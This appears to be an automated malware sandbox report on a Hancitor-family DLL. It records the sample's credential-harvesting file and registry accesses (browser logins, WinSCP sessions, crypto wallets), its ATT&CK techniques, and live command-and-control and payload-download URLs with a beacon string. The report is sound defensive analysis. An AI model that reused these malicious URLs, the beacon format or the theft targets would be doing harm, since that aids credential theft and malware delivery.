                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,_strcpy_s,__invoke_watson,__itoa_s,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LcidFromHexString,GetLocaleInfoA,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLastError,_malloc,WideCharToMultiByte,__freea,GetLocaleInfoA,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,_strcpy_s,__invoke_watson,__itoa_s,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,
                  Source: C:\Windows\SysWOW64\svchost.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\Desktop VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\Documents VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Application Data VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation
                  Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\Desktop VolumeInformation
                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E75256 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00415800 CreateMutexA,LoadLibraryA,URLDownloadToFileA,LoadLibraryA,GetSystemInfo,GlobalMemoryStatusEx,GetTimeZoneInformation,GetLocaleInfoW,CreateToolhelp32Snapshot,Process32First,Process32Next,RegOpenKeyExW,RegEnumKeyExW,RegOpenKeyExW,closesocket,
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02E51AA0 GetVersion,CreateWindowExA,UnregisterClassA,DdeInitializeA,CreateWindowInBand,wsprintfA,wsprintfA,
                  Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information:

                  barindex
                  Tries to harvest and steal Bitcoin Wallet informationShow sources
                  Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                  Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Tries to harvest and steal browser information (history, passwords, etc)Show sources
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Cookies
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Local State
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Tries to steal Instant Messenger accounts or passwordsShow sources
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml

                  Remote Access Functionality:

                  barindex
                  Yara detected HancitorShow sources
                  Source: Yara matchFile source: 2.3.rundll32.exe.664392.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.3.rundll32.exe.664392.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.rundll32.exe.4f44392.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.rundll32.exe.d14392.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.3.rundll32.exe.dd4392.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.loaddll32.exe.1504392.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.3.rundll32.exe.634392.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.3.rundll32.exe.4f4392.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.3.rundll32.exe.634392.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.3.rundll32.exe.dd4392.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.rundll32.exe.d14392.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.rundll32.exe.2e50000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.rundll32.exe.4ba0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.loaddll32.exe.1504392.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.3.rundll32.exe.4ca4392.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.3.rundll32.exe.4f4392.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.rundll32.exe.4f44392.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.3.rundll32.exe.4ca4392.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.rundll32.exe.4430000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.488456292.0000000004434000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.338747871.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.339351013.0000000000660000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.363092172.00000000004F0000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.488244690.0000000002E54000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000003.441877348.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.371171215.0000000001500000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000003.368759303.0000000004F40000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.355295800.0000000000630000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.488676401.0000000004BA4000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000003.443699128.0000000004CA0000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4156, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5972, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4708, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2988, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3704, type: MEMORY

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsNative API1Create Account1Process Injection212Deobfuscate/Decode Files or Information1OS Credential Dumping1System Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsObfuscated Files or Information2Input Capture11System Information Discovery55Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Software Packing1Credentials in Registry2Security Software Discovery21SMB/Windows Admin SharesInput Capture11Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Masquerading1Credentials In Files1Virtualization/Sandbox Evasion1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion1LSA SecretsProcess Discovery13SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection212Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncSystem Network Configuration Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 446231 Sample: niberius.dll Startdate: 09/07/2021 Architecture: WINDOWS Score: 100 52 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->52 54 Multi AV Scanner detection for domain / URL 2->54 56 Found malware configuration 2->56 58 6 other signatures 2->58 8 loaddll32.exe 1 2->8         started        process3 process4 10 cmd.exe 1 8->10         started        12 rundll32.exe 8->12         started        15 rundll32.exe 12 8->15         started        18 4 other processes 8->18 dnsIp5 20 rundll32.exe 12 10->20         started        70 System process connects to network (likely due to code injection or exploit) 12->70 72 May check the online IP address of the machine 12->72 74 Contains functionality to inject threads in other processes 12->74 40 sudepallon.com 15->40 42 nagano-19599.herokussl.com 15->42 48 2 other IPs or domains 15->48 44 23.21.224.49, 49759, 80 AMAZON-AESUS United States 18->44 46 sudepallon.com 18->46 50 3 other IPs or domains 18->50 signatures6 process7 dnsIp8 28 sudepallon.com 77.222.42.67, 49719, 49722, 49724 SWEB-ASRU Russian Federation 20->28 30 srand04rf.ru 8.211.241.0, 49720, 80 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 20->30 32 3 other IPs or domains 20->32 60 System process connects to network (likely due to code injection or exploit) 20->60 24 svchost.exe 16 20->24         started        signatures9 process10 dnsIp11 34 pospvisis.com 95.213.179.67, 49727, 49788, 80 SELECTELRU Russian Federation 24->34 36 nagano-19599.herokussl.com 24->36 38 2 other IPs or domains 24->38 62 System process connects to network (likely due to code injection or exploit) 24->62 64 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 24->64 66 May check the online IP address of the machine 24->66 68 3 other signatures 24->68 signatures12

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  niberius.dll9%VirustotalBrowse

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  15.2.rundll32.exe.4ba0000.1.unpack100%AviraTR/Hijacker.GenDownload File
                  3.2.rundll32.exe.2e50000.2.unpack100%AviraTR/Hijacker.GenDownload File
                  14.2.rundll32.exe.4430000.2.unpack100%AviraTR/Hijacker.GenDownload File

                  Domains

                  SourceDetectionScannerLabelLink
                  srand04rf.ru13%VirustotalBrowse
                  pospvisis.com12%VirustotalBrowse
                  sudepallon.com2%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://sudepallon.com/8/forum.phpK0%Avira URL Cloudsafe
                  http://sudepallon.com/8/forum.phpeBH0%Avira URL Cloudsafe
                  http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID0%Avira URL Cloudsafe
                  http://srand04rf.ru/7hfjsdfjks.exe0%Avira URL Cloudsafe
                  http://sudepallon.com/8/forum.php=0%Avira URL Cloudsafe
                  http://thentabecon.ru/8/forum.php0%Avira URL Cloudsafe
                  http://sudepallon.com/8/forum.phppR0%Avira URL Cloudsafe
                  http://sudepallon.com/8/forum.phpea0%Avira URL Cloudsafe
                  http://sudepallon.com/8/forum.phpT0%Avira URL Cloudsafe
                  http://sudepallon.com/8/forum.php6O0%Avira URL Cloudsafe
                  http://sudepallon.com/8/forum.phph0%Avira URL Cloudsafe
                  http://sudepallon.com/8/forum.php&0%Avira URL Cloudsafe
                  http://sudepallon.com/8/forum.phponnection:0%Avira URL Cloudsafe
                  http://sudepallon.com/8/forum.php.com/8/forum.php0%Avira URL Cloudsafe
                  http://sudepallon.com/8/forum.phpb0%Avira URL Cloudsafe
                  http://sudepallon.com/fjsdfjks.exe0%Avira URL Cloudsafe
                  http://sudepallon.com/8/forum.php0%Avira URL Cloudsafe
                  http://sudepallon.com/8/forum.php:0%Avira URL Cloudsafe
                  http://sudepallon.com/8/forum.php80%Avira URL Cloudsafe
                  http://anspossthrly.ru/8/forum.php0%Avira URL Cloudsafe
                  http://sudepallon.com/8/forum.phps0%Avira URL Cloudsafe
                  http://sudepallon.com/8/forum.php.com/8/forum.phpeBH0%Avira URL Cloudsafe
                  http://sudepallon.com/8/forum.php20%Avira URL Cloudsafe
                  http://sudepallon.com/8/forum.phpq0%Avira URL Cloudsafe
                  http://sudepallon.com/8/forum.phpp0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  elb097307-934924932.us-east-1.elb.amazonaws.com
                  		23.21.173.155
                  		truefalse
                    		high
                    srand04rf.ru
                    		8.211.241.0
                    		truetrueunknown
                    pospvisis.com
                    		95.213.179.67
                    		truetrueunknown
                    sudepallon.com
                    		77.222.42.67
                    		truetrueunknown
                    api.ipify.org
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://srand04rf.ru/7hfjsdfjks.exetrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://thentabecon.ru/8/forum.phptrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://api.ipify.org/false
                        		high
                        http://sudepallon.com/8/forum.phptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://anspossthrly.ru/8/forum.phptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://api.ipify.org/?format=xmlfalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://sudepallon.com/8/forum.phpKrundll32.exe, 00000003.00000003.462185415.0000000003049000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://sudepallon.com/8/forum.phpeBHrundll32.exe, 00000003.00000003.462185415.0000000003049000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUIDrundll32.exe, 00000002.00000003.339351013.0000000000660000.00000040.00000001.sdmp, rundll32.exe, 00000003.00000003.338747871.0000000000D10000.00000040.00000001.sdmp, rundll32.exe, 00000003.00000002.488244690.0000000002E54000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000003.368759303.0000000004F40000.00000040.00000001.sdmp, rundll32.exe, 0000000E.00000002.488456292.0000000004434000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000003.441877348.0000000000DD0000.00000040.00000001.sdmp, rundll32.exe, 0000000F.00000002.488676401.0000000004BA4000.00000002.00020000.sdmp, rundll32.exe, 0000000F.00000003.443699128.0000000004CA0000.00000040.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          http://sudepallon.com/8/forum.php=rundll32.exe, 00000003.00000002.488661456.000000000306C000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://sudepallon.com/8/forum.phppRrundll32.exe, 00000003.00000003.470696238.0000000003076000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://sudepallon.com/8/forum.phpearundll32.exe, 00000003.00000002.488536012.000000000301A000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://sudepallon.com/8/forum.phpTrundll32.exe, 00000003.00000003.449636554.0000000003049000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://sudepallon.com/8/forum.php6Orundll32.exe, 00000003.00000003.462185415.0000000003049000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://api.ipify.orgrundll32.exefalse
                            		high
                            http://sudepallon.com/8/forum.phpkrundll32.exe, 00000003.00000003.450815474.0000000003049000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.488695100.0000000003074000.00000004.00000020.sdmpfalse
                              		unknown
                              http://sudepallon.com/8/forum.phphrundll32.exe, 00000003.00000003.472349437.0000000003073000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://sudepallon.com/8/forum.php&rundll32.exe, 00000003.00000003.460449950.0000000003049000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://sudepallon.com/8/forum.phponnection:rundll32.exe, 00000003.00000003.462185415.0000000003049000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://sudepallon.com/8/forum.php.com/8/forum.phprundll32.exe, 00000003.00000003.459490879.000000000304A000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.450815474.0000000003049000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://sudepallon.com/8/forum.phpbrundll32.exe, 00000003.00000003.472349437.0000000003073000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://sudepallon.com/fjsdfjks.exerundll32.exe, 00000003.00000003.370674723.000000000306B000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://sudepallon.com/8/forum.php:rundll32.exe, 00000003.00000003.472349437.0000000003073000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://sudepallon.com/8/forum.php8rundll32.exe, 00000003.00000003.472349437.0000000003073000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://sudepallon.com/8/forum.phpsrundll32.exe, 00000003.00000002.488536012.000000000301A000.00000004.00000020.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://sudepallon.com/8/forum.php.com/8/forum.phpeBHrundll32.exe, 00000003.00000003.463068143.0000000003049000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://sudepallon.com/8/forum.php2rundll32.exe, 00000003.00000002.488536012.000000000301A000.00000004.00000020.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://sudepallon.com/8/forum.phpqrundll32.exe, 00000003.00000003.463068143.0000000003049000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://sudepallon.com/8/forum.phpprundll32.exe, 00000003.00000003.468221370.000000000306B000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              23.21.173.155
                              		elb097307-934924932.us-east-1.elb.amazonaws.comUnited States
                              		14618AMAZON-AESUSfalse
                              23.21.224.49
                              		unknownUnited States
                              		14618AMAZON-AESUStrue
                              77.222.42.67
                              		sudepallon.comRussian Federation
                              		44112SWEB-ASRUtrue
                              8.211.241.0
                              		srand04rf.ruSingapore
                              		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                              95.213.179.67
                              		pospvisis.comRussian Federation
                              		49505SELECTELRUtrue

                              General Information

                              Joe Sandbox Version:32.0.0 Black Diamond
                              Analysis ID:446231
                              Start date:09.07.2021
                              Start time:03:09:09
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 10m 11s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:niberius.dll
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                              Number of analysed new started processes analysed:25
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.phis.troj.spyw.evad.winDLL@19/2@11/5
                              EGA Information:Failed
                              HDC Information:
                              • Successful, ratio: 6% (good quality ratio 5.8%)
                              • Quality average: 88.6%
                              • Quality standard deviation: 21.2%
                              HCA Information:
                              • Successful, ratio: 65%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .dll
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): taskhostw.exe, audiodg.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe, UsoClient.exe
                              • HTTP Packets have been reduced
                              • TCP Packets have been reduced to 100
                              • Excluded IPs from analysis (whitelisted): 104.43.193.48, 52.147.198.201, 13.64.90.137, 23.54.113.104, 52.255.188.83, 104.42.151.234, 104.43.139.144, 20.190.160.1, 20.190.160.133, 20.190.160.131, 20.190.160.70, 20.190.160.72, 20.190.160.74, 20.190.160.9, 20.190.160.135, 20.50.102.62
                              • Excluded domains from analysis (whitelisted): skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, www.tm.lg.prod.aadmsa.akadns.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, www.tm.a.prd.aadg.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, login.msa.msidentity.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, skypedataprdcoleus17.cloudapp.net, login.live.com, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus16.cloudapp.net
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                              • Report size getting too big, too many NtOpenFile calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              03:11:15API Interceptor333x Sleep call for process: rundll32.exe modified
                              03:11:20API Interceptor1x Sleep call for process: loaddll32.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              23.21.173.155triage_dropped_file.dllGet hashmaliciousBrowse
                              • api.ipify.org/
                              0708_5355150121.xllGet hashmaliciousBrowse
                              • api.ipify.org/
                              file.docGet hashmaliciousBrowse
                              • api.ipify.org/?format=xml
                              file.dllGet hashmaliciousBrowse
                              • api.ipify.org/?format=xml
                              file.dllGet hashmaliciousBrowse
                              • api.ipify.org/?format=xml
                              file.docGet hashmaliciousBrowse
                              • api.ipify.org/?format=xml
                              file.dllGet hashmaliciousBrowse
